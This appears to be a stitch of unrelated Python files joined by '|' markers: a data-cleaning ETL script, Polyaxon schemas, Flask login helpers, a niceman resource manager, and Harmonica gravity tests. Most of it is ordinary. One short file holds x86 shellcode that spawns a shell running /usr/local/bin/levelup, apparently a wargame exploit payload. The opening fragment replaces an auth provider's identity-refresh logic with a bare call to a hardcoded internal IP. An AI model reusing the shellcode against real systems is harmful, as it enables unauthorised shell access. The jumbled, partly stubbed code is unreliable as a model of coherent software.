# 'email': user_data['email'],
# 'name': user_data['name'],
# 'data': self.get_identity_data(data),
# }
def update_identity(self, new_data, current_data):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return new_data
def refresh_identity(self, auth_identity):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# url = '%s?corpid=%s&corpsecret=%s' % (self.access_token_url, self.client_id, self.client_secret)
# response = safe_urlopen(url)
# self.logger.debug('Response code: %s, content: %s' % (response.status_code, response.content))
# data = json.loads(response.content)
# if data['errcode'] != 0:
# raise IdentityNotValid('errcode: %d, errmsg: %s' & (data['errcode'], data['errmsg']))
# auth_identity.data.update(self.get_identity_data(data))
# auth_identity.update(data=auth_identity.data)
|
import sys
import sqlite3
import pandas as pd
import sqlalchemy as sql
def load_data(messages_filepath, categories_filepath):
''''
load messages and categories and merge them
INPUT:
messages_filepath: Path to the messages file
categories_filepath: Path to the categories file
OUTPUT:
df: The dataframe with the merged information
'''
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = messages.merge(categories, how='inner', on='id')
return df
def clean_data(df):
''''
clean the dataframe
INPUT:
df: the dataframe that will be cleaned
OUTUPT:
df: the dataframe cleaned
'''
categories = df['categories'].str.split(';', expand=True)
# select the first row of the categories dataframe
row = categories.head(1)
# use this row to extract a list of new column names for categories.
# one way is to apply a lambda function that takes everything
# up to the second to last character of each string with slicing
category_colnames = row.apply(lambda x: x.str[:-2])
# rename the columns of `categories`
categories.columns = category_colnames.iloc[0]
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].str[-1]
# convert column from string to numeric
categories[column] = pd.to_numeric(categories[column])
df.drop(columns='categories', axis=0, inplace=True)
df = pd.concat([df, categories], axis=1)
df.drop_duplicates(inplace=True)
# forcing all related data to be binary
df['related'] = df['related'].astype('str').str.replace('2', '1')
df['related'] = df['related'].astype('int')
return df
def save_data(df, database_filename):
''''
save the dataframe to a sql file
INPUT
df: the dataframe
database_filename: the file name of the sql file
'''
print(df.head())
engine = sql.create_engine('sqlite:///' + database_filename)
df.to_sql('messages', engine, index=False, if_exists='replace')
def main():
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '
'datasets as the first and second argument respectively, as '
'well as the filepath of the database to save the cleaned data '
'to as the third argument. \n\nExample: python process_data.py '
'disaster_messages.csv disaster_categories.csv '
'DisasterResponse.db')
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from marshmallow import fields
from polyaxon_schemas.base import BaseConfig, BaseSchema
from polyaxon_schemas.fields import UUID
class NodeGPUSchema(BaseSchema):
index = fields.Int()
name = fields.Str()
uuid = UUID()
memory = fields.Int()
serial = fields.Str()
cluster_node = UUID()
@staticmethod
def schema_config():
return NodeGPUConfig
class NodeGPUConfig(BaseConfig):
"""
Node gpu config.
Args:
index: `int`. The index of the gpu during the discovery.
name: `str`. The name of gpu.
uuid: `UUID`. The uuid of gpu.
memory: `int`. The memory size of the gpu.
serial: `str`. The serial of the gpu.
cluster_node: `UUID`. the uuid of the cluster node.
"""
SCHEMA = NodeGPUSchema
IDENTIFIER = 'NodeGPU'
DEFAULT_EXCLUDE_ATTRIBUTES = ['uuid', 'cluster_node']
def __init__(self, index, name, uuid, memory, serial, cluster_node):
self.uuid = uuid
self.serial = serial
self.name = name
self.index = index
self.memory = memory
self.cluster_node = cluster_node
class ClusterNodeSchema(BaseSchema):
sequence = fields.Int(allow_none=True)
name = fields.Str(allow_none=True)
uuid = UUID()
status = fields.Str(allow_none=True)
hostname = fields.Str(allow_none=True)
role = fields.Str(allow_none=True)
memory = fields.Int(allow_none=True)
cpu = fields.Float(allow_none=True)
n_gpus = fields.Int(allow_none=True)
kubelet_version = fields.Str(allow_none=True)
docker_version = fields.Str(allow_none=True)
os_image = fields.Str(allow_none=True)
kernel_version = fields.Str(allow_none=True)
schedulable_taints = fields.Bool(allow_none=True)
schedulable_state = fields.Bool(allow_none=True)
gpus = fields.Nested(NodeGPUSchema, many=True, allow_none=True)
@staticmethod
def schema_config():
return ClusterNodeConfig
class ClusterNodeConfig(BaseConfig):
"""
Node gpu config.
Args:
uuid: `UUID`. the uuid of the cluster node.
sequence: `int`. The sequence of the node in the cluster.
name: `str`. The name of node.
hostname: `str`. The node hostname.
role: `str`. The role of the node.
docker_version: `str`. The docker version used in the node.
kubelet_version: `str`. The kubelet version used in the node.
os_image: `str`. The os image used of the node.
kernel_version: `str`. The kernel version of the node.
schedulable_taints: `bool`. The schedulable taints of the node.
schedulable_state: `bool`. The schedulable state of the node.
memory: `int`. The memory size of the node.
cpu: `float`. The cpu of the node.
n_gpus: `int`. The number of gpus in the node.
status: `str`. The status of the node (ready or ...)
gpus: `list(NodeGPUConfig)`. The node gpus.
"""
SCHEMA = ClusterNodeSchema
IDENTIFIER = 'ClusterNode'
DEFAULT_INCLUDE_ATTRIBUTES = [
'sequence', 'name', 'hostname', 'role', 'memory', 'cpu', 'n_gpus', 'status'
]
def __init__(self,
uuid,
sequence=None,
name=None,
hostname=None,
role=None,
docker_version=None,
kubelet_version=None,
os_image=None,
kernel_version=None,
schedulable_taints=None,
schedulable_state=None,
memory=None,
cpu=None,
n_gpus=None,
status=None,
gpus=None):
self.uuid = uuid
self.sequence = sequence
self.name = name
self.hostname = hostname
self.role = role
self.docker_version = docker_version
self.kubelet_version = kubelet_version
self.os_image = os_image
self.kernel_version = kernel_version
self.schedulable_taints = schedulable_taints
self.schedulable_state = schedulable_state
self.memory = memory
self.cpu = cpu
self.n_gpus = n_gpus
self.status = status
self.gpus = gpus
class PolyaxonClusterSchema(BaseSchema):
version_api = fields.Dict()
nodes = fields.Nested(ClusterNodeSchema, many=True, allow_none=True)
@staticmethod
def schema_config():
return PolyaxonClusterConfig
class PolyaxonClusterConfig(BaseConfig):
"""
Polyaxon cluster config.
Args:
version_api: `dict`. The cluster's version api.
nodes: list(ClusterNodeConfig). The nodes in the cluster.
"""
SCHEMA = PolyaxonClusterSchema
IDENTIFIER = 'PolyaxonCluster'
def __init__(self, version_api, nodes=None):
self.version_api = version_api
self.nodes = nodes
|
from sqlalchemy import Column, Integer, String
from repository.sqlite import Base
class Category(Base):
__tablename__ = "category"
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
@property
def serialize(self):
return {
'name': self.name,
'id': self.id,
}
|
#!/usr/bin/env python2
# This machine code will spawn a shell on this machine if run on the CPU
shellcode = b'\xeb\x16\x5b\x31\xc0\x88\x43\x16\x89\x5b\x17\x89\x43'
shellcode += b'\x1b\xb0\x0b\x8d\x4b\x17\x8d\x53\x1b\xcd\x80\xe8\xe5'
shellcode += b'\xff\xff\xff/usr/local/bin/levelupXAAAABBBB'
print shellcode
|
##### TEC Control Messages #####
# TODO
|
''' This spins up a workbench server for the tests to hit '''
class TestServerSpinup(object):
''' Spin up a Worbench test server '''
def test_server_spinup(self, workbench_conn):
''' Start the workbench Server: although it looks like this
test doesn't do anything, because it hits the 'workbench_conn'
fixture a workbench server will spin up '''
print '\nStarting up the Workbench server...'
print workbench_conn
return True
|
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the niceman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Classes to manage compute resources."""
import attr
from importlib import import_module
import abc
from six.moves.configparser import NoSectionError
import yaml
from os.path import basename
from os.path import dirname
from os.path import join as opj
from glob import glob
import os.path
from ..config import ConfigManager, LOCATIONS_DOC
from ..dochelpers import exc_str
from ..support.exceptions import ResourceError
from ..support.exceptions import MissingConfigError, MissingConfigFileError
from ..ui import ui
import logging
lgr = logging.getLogger('niceman.resource.base')
class ResourceManager(object):
"""
Class to help manage resources.
"""
__metaclass__ = abc.ABCMeta
@staticmethod
def factory(config):
"""Factory method for creating the appropriate Container sub-class.
Parameters
----------
resource_config : ResourceConfig object
Configuration parameters for the resource.
Returns
-------
Resource sub-class instance.
"""
if 'type' not in config:
raise MissingConfigError("Resource 'type' parameter missing for resource.")
type_ = config['type']
module_name = '_'.join(type_.split('-'))
class_name = ''.join([token.capitalize() for token in type_.split('-')])
try:
module = import_module('niceman.resource.{}'.format(module_name))
except ImportError as exc:
raise ResourceError(
"Failed to import resource: {}. Known ones are: {}".format(
exc_str(exc),
', '.join(ResourceManager._discover_types()))
)
instance = getattr(module, class_name)(**config)
return instance
# TODO: Following methods might better be in their own class
@staticmethod
def _discover_types():
"""Discover resource types by instpecting the resource directory files.
Returns
-------
string list
List of resource identifiers extracted from file names.
"""
l = []
for f in glob(opj(dirname(__file__), '*.py')):
f_ = basename(f)
if f_ in ('base.py',) or f_.startswith('_'):
continue
l.append(f_[:-3])
return sorted(l)
@staticmethod
def get_resource_info(config_path, name, id_=None, type_=None):
"""Sort through the parameters supplied by the user at the command line and then
request the ones that are missing that are needed to find the config and
inventory files and then build the config dictionary needed to connect
to the environment.
Parameters
----------
config_path : string
Path to the niceman.cfg file.
name : string
Name of the resource
id_ : string
The identifier of the resource as assigned to it by the backend
type_ : string
Type of the resource module used to manage the name, e.g.
"docker_container".
Returns
-------
config : dict
The config settings for the name.
inventory : dict
Inventory of all the managed resources and their configurations.
"""
# Get name configuration for this name if it exists
# We get the config from inventory first if it exists and then
# overlay the default config settings from repronim.cfg
cm = ResourceManager.get_config_manager(config_path)
inventory_path = cm.getpath('general', 'inventory_file')
inventory = ResourceManager.get_inventory(inventory_path)
# XXX: ATM mixes creation with querying existing resources.
# IMHO (yoh) should just query, and leave creation to a dedicated function
# TODO: query could be done via ID
# TODO: check that if both name and id provided -- they are as it is in
# inventory
# TODO: if no name or id provided, then fail since this function
# is not created to return a list of resources for a given type ATM
valid_resource_types = [t.replace("_", "-") for t in ResourceManager._discover_types()]
if name in inventory:
# XXX so what is our convention here on SMTH-SMTH defining the type?
try:
config = dict(cm.items(inventory[name]['type'].split('-')[0]))
except NoSectionError:
config = {}
config.update(inventory[name])
elif type_ and type_ in valid_resource_types:
try:
config = dict(cm.items(type_.split('-')[0]))
except NoSectionError:
config = {}
else:
type_ = ui.question(
"Enter a resource type",
# TODO: decision on type of a container, if needed
# needs to be done outside, and should be configurable
# or follow some heuristic (e.g. if name starts with a
# known type, e.g. docker-
default="docker-container"
)
config = {}
if type_ not in valid_resource_types:
raise MissingConfigError(
"Resource type '{}' is not valid".format(type_))
# Overwrite config settings with those from the command line.
config['name'] = name
if type_:
config['type'] = type_
if id_:
config['id'] = id_
return config, inventory
@staticmethod
def get_config_manager(config_path=None):
"""Returns the information stored in the niceman.cfg file.
Parameters
----------
config_path : string
Path to the niceman.cfg file. (optional)
Returns
-------
cm : ConfigManager object
Information stored in the niceman.cfg file.
"""
def get_cm(config_path):
if config_path:
cm = ConfigManager([config_path], False)
else:
cm = ConfigManager()
return cm
# Look for a niceman.cfg file in the local directory if none given.
if not config_path and os.path.isfile('niceman.cfg'):
config_path = 'niceman.cfg'
cm = get_cm(config_path=config_path)
if not config_path and len(cm._sections) == 1:
config = ui.question("Enter a config file", default="niceman.cfg")
cm = get_cm(config_path=config)
if len(cm._sections) == 1:
from ..interface.base import dedent_docstring
raise MissingConfigFileError(
"Unable to locate config file: {}\n"
"You must specify it using --config "
"or place it in any of the following locations:\n\n"
"{}\n\n".format(config_path or config,
dedent_docstring(LOCATIONS_DOC)))
return cm
@staticmethod
def get_inventory(inventory_path):
"""Returns a dictionary containing the config information for all resources
created by niceman.
Parameters
----------
inventory_path : string
Path to the inventory file which is declared in the niceman.cfg file.
Returns
-------
inventory : dict
Hash whose key is resource name and value is the config settings for
the resource.
"""
if not inventory_path:
raise MissingConfigError(
"No resource inventory file declared in niceman.cfg")
# Create inventory file if it does not exist.
if not os.path.isfile(inventory_path):
lgr.info("Creating resources inventory file %s", inventory_path)
# initiate empty inventory
ResourceManager.set_inventory({'_path': inventory_path})
with open(inventory_path, 'r') as fp:
inventory = yaml.safe_load(fp)
inventory['_path'] = inventory_path
return inventory
@staticmethod
def set_inventory(inventory):
"""Save the resource inventory to a file. The location of the file is
declared in the niceman.cfg file.
Parameters
----------
inventory : dict
Hash whose key is the name of the resource and value is the config
settings of the resource.
"""
# Operate on a copy so there is no side-effect of modifying original
# inventory
inventory = inventory.copy()
inventory_path = inventory.pop('_path')
for key in list(inventory): # go through a copy of all keys since we modify
# A resource without an ID has been deleted.
inventory_item = inventory[key]
if 'id' in inventory_item and not inventory_item['id']:
del inventory[key]
# Remove AWS credentials
# XXX(yoh) where do we get them from later?
for secret_key in ('access_key_id', 'secret_access_key'):
if secret_key in inventory_item:
del inventory_item[secret_key]
with open(inventory_path, 'w') as fp:
yaml.safe_dump(inventory, fp, default_flow_style=False)
class Resource(object):
"""
Base class for creating and managing compute resources.
"""
__metaclass__ = abc.ABCMeta
def __repr__(self):
return 'Resource({})'.format(self.name)
def add_command(self, command, env=None):
"""Add a command to the command buffer so that all commands can be
run at once in a batch submit to the environment.
Parameters
----------
command : string or list
Command string or list of command string tokens.
env : dict
Additional (or replacement) environment variables which are applied
only to the current call
"""
if not hasattr(self, '_command_buffer'):
self._command_buffer = [] # Each element is a dictionary in the
# form {command=[], env={}}
self._command_buffer.append({'command': command, 'env': env})
def execute_command_buffer(self, session=None):
"""Send all the commands in the command buffer to the environment for
execution.
Parameters
----------
session : Sesson object, optional
Session object reflects the resource type. (the default is None,
which will cause the Session object to be retrieved from the
Resource object.)
"""
if not session:
session = self.get_session(pty=False)
for command in self._command_buffer:
lgr.debug("Running command '%s'", command['command'])
session.execute_command(command['command'], env=command['env'])
def set_envvar(self, var, value):
"""Save an environment variable for inclusion in the environment
Parameters
----------
var : string
Env variable name
value : string
Env variable value
"""
# TODO: This wouldn't work correctly since pretty much each command
# then should have its desired env recorded since set_envvar
# could be interleaved with add_command calls
if not hasattr(self, '_env'):
self._env = {}
self._env[var] = value
def get_updated_env(self, custom_env):
"""Returns an env dictionary with additional or replaced values.
Parameters
----------
custom_env : dict
Environment variables to merge into the existing list of declared
environment variables stored in self._env
Returns
-------
dict
Environment variables merged with additional custom variables.
"""
if hasattr(self, '_env'):
merged_env = self._env.copy()
if custom_env:
merged_env.update(custom_env)
return merged_env
return custom_env
@classmethod
def _generate_id(cls):
"""Utility class method to generate a UUID.
Returns
-------
string
Newly created UUID
"""
import uuid
# just a random uuid for now, TODO: think if we somehow could
# fingerprint it so to later be able to decide if it is 'ours'? ;)
return str(uuid.uuid1())
@abc.abstractmethod
def get_session(self, pty=False, shared=None):
"""Returns the Session object for this resource.
Parameters
----------
pty : bool, optional
Terminal session (the default is False)
shared : string, optional
Shared session identifier (the default is None)
Raises
------
NotImplementedError
[description]
"""
raise NotImplementedError
|
import flask
import flask_login
import flask_principal
from .models import UserAccount, Anonymous, Role
def init_login_manager(db):
"""Init security extensions (login manager and principal)
:param db: Database which stores user accounts and roles
:type db: ``flask_sqlalchemy.SQLAlchemy``
:return: Login manager and principal extensions
:rtype: (``flask_login.LoginManager``, ``flask_principal.Principal``
"""
login_manager = flask_login.LoginManager()
principals = flask_principal.Principal()
login_manager.anonymous_user = Anonymous
@login_manager.unauthorized_handler
def unauthorized():
flask.abort(403)
@login_manager.user_loader
def load_user(user_id):
return db.session.query(UserAccount).get(int(user_id))
@principals.identity_loader
def identity_loader():
return flask_principal.AnonymousIdentity()
return login_manager, principals
class PermissionsContainer:
"""Container for permission to be used for decorators"""
def __init__(self, name):
self.x_name = name
self.x_dict = dict()
def __getattr__(self, key):
return flask_principal.Permission(*self.x_dict.get(key, []))
class Permissions:
"""Class for prividing various permissions"""
def __init__(self):
self.roles = PermissionsContainer('roles')
self.actions = PermissionsContainer('actions')
def register_role(self, role_name):
"""Register new role by name
:param role_name: name of role to register
:type role_name: str
"""
self.roles.x_dict[role_name] = \
(flask_principal.RoleNeed(role_name),)
def register_action(self, priv_name):
"""Register new action privilege by name
:param priv_name: name of action privilege to register
:type priv_name: str
"""
self.actions.x_dict[priv_name] = \
(flask_principal.ActionNeed(priv_name),)
@property
def all_roles(self):
"""All registered roles
:return: set of str
"""
return set(self.roles.x_dict.keys())
@property
def all_actions(self):
"""All registered action privileges
:return: set of str
"""
return set(self.actions.x_dict.keys())
#: All permissions in the app
permissions = Permissions()
def login(user_account):
"""Login desired user into the app
:param user_account: User account to be logged in
:type user_account: ``repocribro.models.UserAccount``
"""
flask_login.login_user(user_account)
flask_principal.identity_changed.send(
flask_principal.current_app._get_current_object(),
identity=flask_principal.Identity(user_account.id)
)
def logout():
"""Logout the current user from the app"""
flask_login.logout_user()
clear_session('identity.name', 'identity.auth_type')
flask_principal.identity_changed.send(
flask.current_app._get_current_object(),
identity=flask_principal.AnonymousIdentity()
)
def clear_session(*args):
"""Simple helper for clearing variables from session
:param args: names of session variables to remove
"""
for key in args:
flask.session.pop(key, None)
def reload_anonymous_role(app, db):
"""Reload special role for anonymous users
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
"""
with app.app_context():
anonymous_role = None
try:
anonymous_role = db.session.query(Role).filter_by(
name=Anonymous.rolename
).first()
except:
pass
if anonymous_role is not None:
Anonymous.set_role(anonymous_role)
def get_default_user_role(app, db):
"""Get special default role for registered users
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
"""
user_role = None
with app.app_context():
try:
user_role = db.session.query(Role).filter_by(
name=UserAccount.default_rolename
).first()
except:
pass
return user_role
def create_default_role(app, db, role):
"""Create default role for the app
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
:param role: Role to be created
:type role: ``repocribro.models.Role``
"""
with app.app_context():
try:
existing_role = db.session.query(Role).filter_by(
name=role.name
).first()
if existing_role is None:
db.session.add(role)
db.session.commit()
except:
pass
@flask_principal.identity_loaded.connect
def on_identity_loaded(sender, identity):
"""Principal helper for loading the identity of logged user
:param sender: Sender of the signal
:param identity: Identity container
:type identity: ``flask_principal.Identity``
"""
user = flask_login.current_user
identity.user = user
if hasattr(user, 'id'):
identity.provides.add(
flask_principal.UserNeed(flask_login.current_user.id)
)
if hasattr(user, 'roles'):
for role in user.roles:
identity.provides.add(
flask_principal.RoleNeed(role.name)
)
for priviledge in user.privileges(permissions.all_actions):
identity.provides.add(
flask_principal.ActionNeed(priviledge)
)
|
#!/usr/bin/env python3
from find_terms import *
from DataDef import File
import dictionary
from refactoring_support import *
def main(args):
# global special_domains
Refactoring.run_filter_phase = False
file_list = args[1]
if len(args) > 2:
outfile_prefix = args[2]
else:
outfile_prefix = False
if (len(args) > 3) and (args[3].lower() != 'false'):
dictionary.special_domains.extend(args[3].split('+')) # @semanticbeeng @todo @arch global state initialization
dictionary.initialize_utilities()
find_inline_terms_for_file_list(File(file_list), dict_prefix=outfile_prefix)
# @semanticbeeng @todo to run from @jep
if __name__ == '__main__':
# sys.settrace(trace_args_and_return)
sys.exit(main(sys.argv))
|
class SearchQueryMixin:
def get_response_for_query(self, query):
self.login_required()
return self.client.get(
self.get_url(name="list", **self.get_extra_kwargs()),
data={"query": query},
)
def assertResultEqual(self, response, items):
self.assertEqual(response.status_code, 200, response.json())
item = response.json()["results"]
self.assertEqual(len(item), len(items))
for i, el in enumerate(items):
self.assertEqual(item[i]["id"], el.pk)
def test_search_by_pk(self):
# should support always filter by pk
second = self.factory_class()
response = self.get_response_for_query(f"id:{second.pk}")
self.assertResultEqual(response, [second])
def test_search_invalid(self):
self.login_required()
response = self.get_response_for_query("id:")
self.assertEqual(response.status_code, 400, response.json())
item = response.json()
self.assertEqual(
item["query"][0],
"Expected end of text, found ':' (at char 2), (line:1, col:3)",
)
|
sounds = ["super", "cali", "fragil", "istic", "expi", "ali", "docious"]
result = ''
for fragment in sounds:
result += fragment
result = result.upper()
print(result)
|
# Copyright (c) 2018 The Harmonica Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
# pylint: disable=protected-access
"""
Test prisms layer
"""
import warnings
import pytest
import numpy as np
import numpy.testing as npt
import verde as vd
import xarray as xr
from .. import prism_layer, prism_gravity
@pytest.fixture(params=("numpy", "xarray"))
def dummy_layer(request):
"""
Generate dummy arrays for defining prism layers
"""
easting = np.linspace(-1, 3, 5)
northing = np.linspace(7, 13, 4)
shape = (northing.size, easting.size)
reference = 0
surface = np.arange(20, dtype=float).reshape(*shape)
density = 2670 * np.ones(shape)
if request.param == "xarray":
easting = xr.DataArray(easting, dims=("easting",))
northing = xr.DataArray(northing, dims=("northing",))
reference, surface = xr.DataArray(reference), xr.DataArray(surface)
density = xr.DataArray(density)
return (easting, northing), surface, reference, density
@pytest.fixture
def prism_layer_with_holes(dummy_layer): # pylint: disable=redefined-outer-name
"""
Return a set of prisms with some missing elements
The prisms are returned as a tuple of boundaries, ready to be passed to
``hm.prism_gravity``. They would represent the same prisms that the
``dummy_layer`` generated, but with two missing prisms: the ``(3, 3)`` and
the ``(2, 1)``.
"""
(easting, northing), surface, reference, density = dummy_layer
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
indices = [(3, 3), (2, 1)]
prisms = list(
layer.prism_layer.get_prism((i, j))
for i in range(4)
for j in range(5)
if (i, j) not in indices
)
density = list(
density[i, j] for i in range(4) for j in range(5) if (i, j) not in indices
)
return prisms, density
def test_prism_layer(dummy_layer): # pylint: disable=redefined-outer-name
"""
Check if a layer of prisms is property constructed
"""
(easting, northing), surface, reference, _ = dummy_layer
layer = prism_layer((easting, northing), surface, reference)
assert "easting" in layer.coords
assert "northing" in layer.coords
assert "top" in layer.coords
assert "bottom" in layer.coords
npt.assert_allclose(layer.easting, easting)
npt.assert_allclose(layer.northing, northing)
npt.assert_allclose(layer.top, surface)
npt.assert_allclose(layer.bottom, reference)
# Surface below reference on a single point
surface[1, 1] = -1
expected_top = surface.copy()
expected_bottom = np.zeros_like(surface)
expected_top[1, 1], expected_bottom[1, 1] = reference, surface[1, 1]
layer = prism_layer((easting, northing), surface, reference)
assert "easting" in layer.coords
assert "northing" in layer.coords
assert "top" in layer.coords
assert "bottom" in layer.coords
npt.assert_allclose(layer.easting, easting)
npt.assert_allclose(layer.northing, northing)
npt.assert_allclose(layer.top, expected_top)
npt.assert_allclose(layer.bottom, expected_bottom)
def test_prism_layer_invalid_surface_reference(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if invalid surface and/or reference are caught
"""
coordinates, surface, reference, _ = dummy_layer
# Surface with wrong shape
surface_invalid = np.arange(20, dtype=float)
with pytest.raises(ValueError):
prism_layer(coordinates, surface_invalid, reference)
# Reference with wrong shape
reference_invalid = np.zeros(20)
surface = np.arange(20, dtype=float).reshape(4, 5)
with pytest.raises(ValueError):
prism_layer(coordinates, surface, reference_invalid)
def test_prism_layer_properties(dummy_layer): # pylint: disable=redefined-outer-name
"""
Check passing physical properties to the prisms layer
"""
coordinates, surface, reference, density = dummy_layer
suceptibility = 0 * density + 1e-3
layer = prism_layer(
coordinates,
surface,
reference,
properties={"density": density, "suceptibility": suceptibility},
)
npt.assert_allclose(layer.density, density)
npt.assert_allclose(layer.suceptibility, suceptibility)
def test_prism_layer_no_regular_grid(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if error is raised if easting and northing are not regular
"""
(easting, northing), surface, reference, _ = dummy_layer
# Easting as non evenly spaced set of coordinates
easting_invalid = easting.copy()
easting_invalid[3] = -22
with pytest.raises(ValueError):
prism_layer(
(easting_invalid, northing),
surface,
reference,
)
# Northing as non evenly spaced set of coordinates
northing_invalid = northing.copy()
northing_invalid[3] = -22
northing[3] = 12.98
with pytest.raises(ValueError):
prism_layer(
(easting, northing_invalid),
surface,
reference,
)
def test_prism_layer_attributes():
"""
Check attributes of the DatasetAccessorPrismsLayer class
"""
easting = np.linspace(1, 3, 5)
northing = np.linspace(7, 10, 4)
reference = 0
surface = np.arange(20, dtype=float).reshape(4, 5)
layer = prism_layer((easting, northing), surface, reference)
assert layer.prism_layer.dims == ("northing", "easting")
assert layer.prism_layer.spacing == (1, 0.5)
assert layer.prism_layer.boundaries == (
easting[0] - 0.25,
easting[-1] + 0.25,
northing[0] - 0.5,
northing[-1] + 0.5,
)
assert layer.prism_layer.size == 20
assert layer.prism_layer.shape == (4, 5)
def test_prism_layer_to_prisms():
"""
Check the _to_prisms() method
"""
coordinates = (np.array([0, 1]), np.array([0, 1]))
reference = np.arange(4).reshape(2, 2)
surface = (np.arange(4) + 10).reshape(2, 2)
layer = prism_layer(coordinates, surface, reference)
expected_prisms = [
[-0.5, 0.5, -0.5, 0.5, 0, 10],
[0.5, 1.5, -0.5, 0.5, 1, 11],
[-0.5, 0.5, 0.5, 1.5, 2, 12],
[0.5, 1.5, 0.5, 1.5, 3, 13],
]
npt.assert_allclose(expected_prisms, layer.prism_layer._to_prisms())
def test_prism_layer_get_prism_by_index():
"""
Check if the right prism is returned after index
"""
coordinates = (np.array([0, 1]), np.array([0, 1]))
reference = np.arange(4).reshape(2, 2)
surface = (np.arange(4) + 10).reshape(2, 2)
layer = prism_layer(coordinates, surface, reference)
expected_prisms = [
[[-0.5, 0.5, -0.5, 0.5, 0, 10], [0.5, 1.5, -0.5, 0.5, 1, 11]],
[[-0.5, 0.5, 0.5, 1.5, 2, 12], [0.5, 1.5, 0.5, 1.5, 3, 13]],
]
for i in range(2):
for j in range(2):
npt.assert_allclose(
layer.prism_layer.get_prism((i, j)), expected_prisms[i][j]
)
def test_nonans_prisms_mask(dummy_layer): # pylint: disable=redefined-outer-name
"""
Check if the mask for nonans prism is correctly created
"""
(easting, northing), surface, reference, _ = dummy_layer
shape = (northing.size, easting.size)
# No nan in top nor bottom
# ------------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in top only
# ----------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in bottom only
# -------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in top and bottom
# ----------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
for index in ((1, 2), (2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
def test_nonans_prisms_mask_property(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if the method masks the property and raises a warning
"""
(easting, northing), surface, reference, density = dummy_layer
shape = (northing.size, easting.size)
# Nans in top and property (on the same prisms)
# ---------------------------------------------
expected_mask = np.ones_like(surface, dtype=bool)
indices = ((1, 2), (2, 3))
# Set some elements of surface and density as nans
for index in indices:
surface[index] = np.nan
density[index] = np.nan
expected_mask[index] = False
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
# Check if no warning is raised
with warnings.catch_warnings(record=True) as warn:
mask = layer.prism_layer._get_nonans_mask(property_name="density")
assert len(warn) == 0
npt.assert_allclose(mask, expected_mask)
# Nans in top and property (not precisely on the same prisms)
# -----------------------------------------------------------
surface = np.arange(20, dtype=float).reshape(shape)
density = 2670 * np.ones_like(surface)
expected_mask = np.ones_like(surface, dtype=bool)
# Set some elements of surface as nans
indices = ((1, 2), (2, 3))
for index in indices:
surface[index] = np.nan
expected_mask[index] = False
# Set a different set of elements of density as nans
indices = ((2, 2), (0, 1))
for index in indices:
density[index] = np.nan
expected_mask[index] = False
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
# Check if warning is raised
with warnings.catch_warnings(record=True) as warn:
mask = layer.prism_layer._get_nonans_mask(property_name="density")
assert len(warn) == 1
assert issubclass(warn[-1].category, UserWarning)
npt.assert_allclose(mask, expected_mask)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity(
field, dummy_layer
): # pylint: disable=redefined-outer-name
"""
Check if gravity method works as expected
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
(easting, northing), surface, reference, density = dummy_layer
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
expected_result = prism_gravity(
coordinates,
prisms=layer.prism_layer._to_prisms(),
density=density,
field=field,
)
npt.assert_allclose(
expected_result, layer.prism_layer.gravity(coordinates, field=field)
)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity_surface_nans(
field, dummy_layer, prism_layer_with_holes
): # pylint: disable=redefined-outer-name
